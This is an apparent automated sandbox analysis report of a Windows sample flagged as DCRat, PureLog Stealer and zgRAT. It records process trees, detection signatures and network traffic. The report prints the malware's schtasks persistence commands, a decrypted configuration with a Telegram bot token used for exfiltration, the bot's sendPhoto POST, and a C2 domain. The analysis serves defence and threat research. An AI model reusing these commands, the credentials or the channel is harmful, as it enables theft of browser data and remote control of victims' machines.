Edit tour

Windows Analysis Report
YGk3y6Tdix.exe

Overview

General Information

Sample name:	YGk3y6Tdix.exe renamed because original name is a hash value
Original sample name:	e38b0fc914530e6682d067159b0c7c34.exe
Analysis ID:	1583014
MD5:	e38b0fc914530e6682d067159b0c7c34
SHA1:	4661a00c6e199b1277b2af3bb72e5ebc22cbe2d3
SHA256:	476f2ddc0f7c7ef512c71a6faadfead61424d57abf2e4566d48b8dd84545c6cb
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates processes via WMI

Drops PE files with benign system names

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

YGk3y6Tdix.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\YGk3y6Tdix.exe" MD5: E38B0FC914530E6682D067159B0C7C34)

wscript.exe (PID: 7144 cmdline: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 416 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fontdrvhost.exe (PID: 5012 cmdline: "C:\/Drivers/fontdrvhost.exe" MD5: BA58757137700B6B304B45298D986EB1)

schtasks.exe (PID: 4348 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1216 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2992 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4144 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 12 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3068 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6020 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3752 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7048 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6996 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7152 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1068 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6256 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5780 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2260 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3168 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1308 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7272 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7292 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe (PID: 7776 cmdline: "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe" MD5: BA58757137700B6B304B45298D986EB1)

FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe (PID: 7072 cmdline: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe MD5: BA58757137700B6B304B45298D986EB1)

FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe (PID: 6976 cmdline: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe MD5: BA58757137700B6B304B45298D986EB1)

fontdrvhost.exe (PID: 6996 cmdline: C:\Drivers\fontdrvhost.exe MD5: BA58757137700B6B304B45298D986EB1)

fontdrvhost.exe (PID: 6324 cmdline: C:\Drivers\fontdrvhost.exe MD5: BA58757137700B6B304B45298D986EB1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
YGk3y6Tdix.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
YGk3y6Tdix.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Drivers\fontdrvhost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Drivers\fontdrvhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\SIGNUP\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: fontdrvhost.exe PID: 5012	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: fontdrvhost.exe PID: 6324	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.YGk3y6Tdix.exe.68606f6.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.YGk3y6Tdix.exe.68606f6.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.YGk3y6Tdix.exe.52076f6.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.YGk3y6Tdix.exe.52076f6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.0.fontdrvhost.exe.b80000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.0.fontdrvhost.exe.b80000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\YGk3y6Tdix.exe, ProcessId: 6976, TargetFilename: C:\Drivers\fontdrvhost.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f, CommandLine: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\/Drivers/fontdrvhost.exe", ParentImage: C:\Drivers\fontdrvhost.exe, ParentProcessId: 5012, ParentProcessName: fontdrvhost.exe, ProcessCommandLine: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f, ProcessId: 6020, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\YGk3y6Tdix.exe", ParentImage: C:\Users\user\Desktop\YGk3y6Tdix.exe, ParentProcessId: 6976, ParentProcessName: YGk3y6Tdix.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" , ProcessId: 7144, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T14:52:07.667335+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49733	104.21.38.84	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T14:52:00.960663+0100	2803305	3	Unknown Traffic	192.168.2.4	49731	34.117.59.81	443	TCP
2025-01-01T14:52:13.163133+0100	2803305	3	Unknown Traffic	192.168.2.4	49749	34.117.59.81	443	TCP

Joe Security ANOMALY Telegram Send Photo

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T14:52:02.454624+0100	1810009	1	Potentially Bad Traffic	192.168.2.4	49732	149.154.167.220	443	TCP
2025-01-01T14:52:14.162081+0100	1810009	1	Potentially Bad Traffic	192.168.2.4	49753	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: YGk3y6Tdix.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://250345cm.renyash.ru/	Avira URL Cloud: Label: malware
Source: http://250345cm.renyash.ru/sqltemp.php	Avira URL Cloud: Label: malware
Source: http://250345cm.renyash.ru	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\CANODYsk.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\MihenAyR.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Drivers\fontdrvhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\BimGJlFQ.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\LRGWtOLy.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Multi AV Scanner detection for dropped file

Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	ReversingLabs: Detection: 72%
Source: C:\Drivers\fontdrvhost.exe	ReversingLabs: Detection: 72%
Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe	ReversingLabs: Detection: 72%
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	ReversingLabs: Detection: 72%
Source: C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\Desktop\BimGJlFQ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\CANODYsk.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\LRGWtOLy.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\MihenAyR.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\iIcaGucE.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\jqKBOCJa.log	ReversingLabs: Detection: 25%
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	ReversingLabs: Detection: 72%

Multi AV Scanner detection for submitted file

Source: YGk3y6Tdix.exe	Virustotal: Detection: 59%			Perma Link
Source: YGk3y6Tdix.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aFStzZSn.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MihenAyR.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RKjvWuQm.log	Joe Sandbox ML: detected
Source: C:\Drivers\fontdrvhost.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe	Joe Sandbox ML: detected
Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\jWKBqQkB.log	Joe Sandbox ML: detected
Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\sRuyTvnC.log	Joe Sandbox ML: detected
Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LRGWtOLy.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: YGk3y6Tdix.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6283373442","bottoken":"8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"}}
Source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","fontdrvhost","0","NEWORK PC","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]

Source: YGk3y6Tdix.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Drivers\fontdrvhost.exe	Directory created: C:\Program Files\Internet Explorer\SIGNUP\services.exe			Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Directory created: C:\Program Files\Internet Explorer\SIGNUP\c5b4cb5e9653cc			Jump to behavior

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Source: YGk3y6Tdix.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YGk3y6Tdix.exe

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00FAA69B
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00FBC220

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49733 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49753 -> 149.154.167.220:443

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="df078fe5-ba23-4170-8bea-85b5048774e2"Host: api.telegram.orgContent-Length: 86411Expect: 100-continueConnection: Keep-Alive
